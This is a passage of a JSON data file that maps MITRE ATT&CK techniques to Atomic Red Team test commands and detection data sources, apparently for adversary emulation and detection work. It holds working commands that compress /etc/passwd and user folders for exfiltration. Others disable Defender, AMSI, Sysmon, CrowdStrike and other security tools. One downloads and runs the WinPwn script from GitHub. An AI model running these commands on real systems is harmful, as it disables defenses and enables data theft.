+ { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1560.002", + "command_list": [ + "$which_python -c \"import gzip;input_file=open('/etc/passwd', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('#{path_to_output_file}','wb','compresslevel=6');output_file.write(content);output_file.close();\"\n", + "$which_python -c \"import gzip;input_file=open('#{path_to_input_file}', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('/tmp/passwd.gz','wb','compresslevel=6');output_file.write(content);output_file.close();\"\n", + "$which_python -c \"import bz2;input_file=open('/etc/passwd','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('#{path_to_output_file}','w+');output_file.write(bz2content);output_file.close();\"\n", + "$which_python -c \"import bz2;input_file=open('#{path_to_input_file}','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('/tmp/passwd.bz2','w+');output_file.write(bz2content);output_file.close();\"\n", + "$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('/etc/passwd')\"\n", + "$which_python -c \"from zipfile import ZipFile; ZipFile('/tmp/passwd.zip', mode='w').write('#{path_to_input_file}')\"\n", + "$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('/etc/passwd')\" \n", + "$which_python -c \"from zipfile import ZipFile; ZipFile('/tmp/passwd.tar.gz', mode='w').write('#{path_to_input_file}')\" \n" + ], + "commands": [ + { + "command": "$which_python -c \"import gzip;input_file=open('/etc/passwd', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('#{path_to_output_file}','wb','compresslevel=6');output_file.write(content);output_file.close();\"\n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c \"import gzip;input_file=open('#{path_to_input_file}', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('/tmp/passwd.gz','wb','compresslevel=6');output_file.write(content);output_file.close();\"\n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c \"import bz2;input_file=open('/etc/passwd','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('#{path_to_output_file}','w+');output_file.write(bz2content);output_file.close();\"\n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c \"import bz2;input_file=open('#{path_to_input_file}','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('/tmp/passwd.bz2','w+');output_file.write(bz2content);output_file.close();\"\n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('/etc/passwd')\"\n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c \"from zipfile import ZipFile; ZipFile('/tmp/passwd.zip', mode='w').write('#{path_to_input_file}')\"\n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('/etc/passwd')\" \n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c \"from zipfile import ZipFile; ZipFile('/tmp/passwd.tar.gz', mode='w').write('#{path_to_input_file}')\" \n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1560.002", + "display_name": "Archive Collected Data: Archive via Library", + "atomic_tests": [ + { + "name": "Compressing data using GZip in Python (Linux)", + "auto_generated_guid": "391f5298-b12d-4636-8482-35d9c17d53a8", + "description": "Uses GZip from Python to compress files\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_input_file": { + "description": "Path to the file that you want to compress", + "type": "Path", + "default": "/etc/passwd" + }, + "path_to_output_file": { + "description": "Path of the file that you want your .gz file to be", + "type": "Path", + "default": "/tmp/passwd.gz" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Requires Python\n", + "prereq_command": "which_python=`which python`; $which_python -V\n", + "get_prereq_command": "" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "$which_python -c \"import gzip;input_file=open('#{path_to_input_file}', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('#{path_to_output_file}','wb','compresslevel=6');output_file.write(content);output_file.close();\"\n", + "cleanup_command": "rm #{path_to_output_file}\n" + } + }, + { + "name": "Compressing data using bz2 in Python (Linux)", + "auto_generated_guid": "c75612b2-9de0-4d7c-879c-10d7b077072d", + "description": "Uses bz2 from Python to compress files\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_input_file": { + "description": "Path to the file that you want to compress", + "type": "Path", + "default": "/etc/passwd" + }, + "path_to_output_file": { + "description": "Path of the file that you want your .bz2 file to be", + "type": "Path", + "default": "/tmp/passwd.bz2" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Requires Python\n", + "prereq_command": "which_python=`which python`; $which_python -V\n", + "get_prereq_command": "" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "$which_python -c \"import bz2;input_file=open('#{path_to_input_file}','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('#{path_to_output_file}','w+');output_file.write(bz2content);output_file.close();\"\n", + "cleanup_command": "rm #{path_to_output_file}\n" + } + }, + { + "name": "Compressing data using zipfile in Python (Linux)", + "auto_generated_guid": "001a042b-859f-44d9-bf81-fd1c4e2200b0", + "description": "Uses zipfile from Python to compress files\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_input_file": { + "description": "Path to the file that you want to compress", + "type": "Path", + "default": "/etc/passwd" + }, + "path_to_output_file": { + "description": "Path of the file that you want your .zip file to be", + "type": "Path", + "default": "/tmp/passwd.zip" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Requires Python\n", + "prereq_command": "which_python=`which python`; $which_python -V\n", + "get_prereq_command": "" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')\"\n", + "cleanup_command": "rm #{path_to_output_file}\n" + } + }, + { + "name": "Compressing data using tarfile in Python (Linux)", + "auto_generated_guid": "e86f1b4b-fcc1-4a2a-ae10-b49da01458db", + "description": "Uses tarfile from Python to compress files\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_input_file": { + "description": "Path to the file that you want to compress", + "type": "Path", + "default": "/etc/passwd" + }, + "path_to_output_file": { + "description": "Path of the file that you want your .tar.gz file to be", + "type": "Path", + "default": "/tmp/passwd.tar.gz" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Requires Python\n", + "prereq_command": "which_python=`which python`; $which_python -V\n", + "get_prereq_command": "" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')\" \n", + "cleanup_command": "rm #{path_to_output_file}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1560", + "command_list": [ + "dir $env:USERPROFILE -Recurse | Compress-Archive -DestinationPath #{output_file}\n", + "dir #{input_file} -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\\T1560-data-ps.zip\n" + ], + "commands": [ + { + "command": "dir $env:USERPROFILE -Recurse | Compress-Archive -DestinationPath #{output_file}\n", + "source": "atomics/T1560/T1560.yaml", + "name": "Atomic Red Team Test - Archive Collected Data" + }, + { + "command": "dir #{input_file} -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\\T1560-data-ps.zip\n", + "source": "atomics/T1560/T1560.yaml", + "name": "Atomic Red Team Test - Archive Collected Data" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1560", + "display_name": "Archive Collected Data", + "atomic_tests": [ + { + "name": "Compress Data for Exfiltration With PowerShell", + "auto_generated_guid": "41410c60-614d-4b9d-b66e-b0192dd9c597", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration.\nWhen the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "Path that should be compressed into our output file", + "type": "Path", + "default": "$env:USERPROFILE" + }, + "output_file": { + "description": "Path where resulting compressed data should be placed", + "type": "Path", + "default": "$env:USERPROFILE\\T1560-data-ps.zip" + } + }, + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}\n", + "cleanup_command": "Remove-Item -path #{output_file} -ErrorAction Ignore" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1562.001", + "command_list": [ + "#{flavor_command}\n", + "systemctl stop rsyslog ; systemctl disable rsyslog\n", + "if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"6\" ];\nthen\n service cbdaemon stop\n chkconfig off cbdaemon\nelse if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"7\" ];\n systemctl stop cbdaemon\n systemctl disable cbdaemon\nfi\n", + "setenforce 0\n", + "sudo systemctl stop falcon-sensor.service\nsudo systemctl disable falcon-sensor.service\n", + "sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist\nsudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist\n", + "sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist\n", + "sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist\n", + "sudo spctl --master-disable\n", + "sudo launchctl unload /Library/LaunchDaemons/com.crowdstrike.falcond.plist\nsudo launchctl unload #{userdaemon_plist}\n", + "sudo launchctl unload #{falcond_plist}\nsudo launchctl unload /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist\n", + "fltmc.exe unload SysmonDrv\n", + "sysmon -u\n", + "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n", + "Remove-Item -Path \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\" -Recurse\n", + "net.exe stop McAfeeDLPAgentService\nsc.exe config McAfeeDLPAgentService start= disabled\n", + "Set-MpPreference -DisableRealtimeMonitoring 1\nSet-MpPreference -DisableBehaviorMonitoring 1\nSet-MpPreference -DisableScriptScanning 1\nSet-MpPreference -DisableBlockAtFirstSeen 1\n", + "sc stop WinDefend\nsc config WinDefend start=disabled\nsc query WinDefend\n", + "Set-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 1\n", + "New-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\" -Name \"VBAWarnings\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableInternetFilesInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableUnsafeLocationsInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableAttachementsInPV\" -Value \"1\" -PropertyType \"Dword\"\n", + "\"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All\n", + "Stop-Service -Name McAfeeDLPAgentService\nRemove-Service -Name McAfeeDLPAgentService\n", + "if (Test-Path \"C:\\ProgramData\\Package Cache\\{7489ba93-b668-447f-8401-7e57a6fe538d}\\WindowsSensor.exe\") {. \"C:\\ProgramData\\Package Cache\\{7489ba93-b668-447f-8401-7e57a6fe538d}\\WindowsSensor.exe\" /repair /uninstall /quiet } else { Get-ChildItem -Path \"C:\\ProgramData\\Package Cache\" -Include \"WindowsSensor.exe\" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq \"Valid\" -and $sig.SignerCertificate.DnsNameList -eq \"CrowdStrike, Inc.\") { . \"$_\" /repair /uninstall /quiet; break;}}}", + "$excludedpath= \"C:\\Temp\"\nAdd-MpPreference -ExclusionPath $excludedpath", + "$excludedExts= \".exe\"\nAdd-MpPreference -ExclusionExtension $excludedExts", + "$excludedProcess = \"outlook.exe\"\nAdd-MpPreference -ExclusionProcess $excludedProcess", + null, + "Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet", + "cmd /c #{DefenderControlExe} /D FFFF | Out-Null\n", + "cmd /c $env:temp\\DefenderControl\\DefenderControl\\DefenderControl.exe /D #{DefenderID} | Out-Null\n", + "Try {cmd /c $env:temp\\AdvancedRun.exe /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\nif(#{delete_defender_folder}){\n $CommandToRun = rmdir \"$env:programdata\\Microsoft\\Windows Defender\" -Recurse\n Try {cmd /c $env:temp\\AdvancedRun.exe /EXEFilename \"$env:systemroot\\System32\\WindowsPowershell\\v1.0\\powershell.exe\" /WindowState 0 /CommandLine \"$CommandToRun\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n}\n", + "& $env:temp\\Backstab64.exe -k -n MsMpEng.exe", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom -consoleoutput -noninteractive ", + "Set-ItemProperty -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell -Name ExecutionPolicy -Value ByPass;\n $shell = New-Object -ComObject Wscript.Shell\n Set-ExecutionPolicy Bypass | echo $shell.sendkeys(\"Y`r`n\")", + "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) {\n Set-MPPreference -DisableRealtimeMonitoring 1;\n} else {\n $service = Get-Service WinDefend -ErrorAction SilentlyContinue;\n if ($service) {\n if ($service.Status -eq \"Running\") {\n Stop-Service WinDefend;\n }\n } else {\n echo \"Windows Defender service not found.\";\n exit 1;\n };\n};\n", + "Set-MpPreference -DisableIntrusionPreventionSystem $true;\nSet-MpPreference -DisableIOAVProtection $true;\nSet-MpPreference -DisableRealtimeMonitoring $true;\nSet-MpPreference -DisableScriptScanning $true;\nSet-MpPreference -EnableControlledFolderAccess Disabled;\n" + ], + "commands": [ + { + "command": "#{flavor_command}\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "systemctl stop rsyslog ; systemctl disable rsyslog\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"6\" ];\nthen\n service cbdaemon stop\n chkconfig off cbdaemon\nelse if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"7\" ];\n systemctl stop cbdaemon\n systemctl disable cbdaemon\nfi\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "setenforce 0\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sudo systemctl stop falcon-sensor.service\nsudo systemctl disable falcon-sensor.service\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist\nsudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sudo spctl --master-disable\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sudo launchctl unload /Library/LaunchDaemons/com.crowdstrike.falcond.plist\nsudo launchctl unload #{userdaemon_plist}\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sudo launchctl unload #{falcond_plist}\nsudo launchctl unload /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "fltmc.exe unload SysmonDrv\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sysmon -u\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Remove-Item -Path \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\" -Recurse\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "net.exe stop McAfeeDLPAgentService\nsc.exe config McAfeeDLPAgentService start= disabled\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Set-MpPreference -DisableRealtimeMonitoring 1\nSet-MpPreference -DisableBehaviorMonitoring 1\nSet-MpPreference -DisableScriptScanning 1\nSet-MpPreference -DisableBlockAtFirstSeen 1\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sc stop WinDefend\nsc config WinDefend start=disabled\nsc query WinDefend\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Set-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 1\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "New-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\" -Name \"VBAWarnings\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableInternetFilesInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableUnsafeLocationsInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableAttachementsInPV\" -Value \"1\" -PropertyType \"Dword\"\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "\"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Stop-Service -Name McAfeeDLPAgentService\nRemove-Service -Name McAfeeDLPAgentService\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "if (Test-Path \"C:\\ProgramData\\Package Cache\\{7489ba93-b668-447f-8401-7e57a6fe538d}\\WindowsSensor.exe\") {. \"C:\\ProgramData\\Package Cache\\{7489ba93-b668-447f-8401-7e57a6fe538d}\\WindowsSensor.exe\" /repair /uninstall /quiet } else { Get-ChildItem -Path \"C:\\ProgramData\\Package Cache\" -Include \"WindowsSensor.exe\" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq \"Valid\" -and $sig.SignerCertificate.DnsNameList -eq \"CrowdStrike, Inc.\") { . \"$_\" /repair /uninstall /quiet; break;}}}", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": 